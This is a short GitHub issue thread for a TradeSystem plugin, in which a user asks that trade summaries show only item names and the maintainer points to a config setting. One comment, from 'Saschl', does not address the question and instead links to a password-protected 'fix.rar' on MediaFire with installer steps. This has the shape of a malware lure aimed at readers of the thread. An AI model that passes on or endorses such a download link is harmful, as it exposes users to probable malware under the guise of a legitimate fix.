### ISSUE TITLE
NAME OF THE ITEM

### ISSUE THREAD

**Issue by kurkinsnetwork** [erikzimmermann/TradeSystem#556]
In the trade summary, it says which items I created with the itemsadder plugin are. Please only write the name of the item.
PROBLEM: https://prnt.sc/STui-K3-QPpV
**Discord contact**: kurkins

**Comment by Saschl** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by erikzimmermann** [comment]
Hi, please take a look into the config at `Trade_Finish_Report.Display_Name_Only` ✌🏻
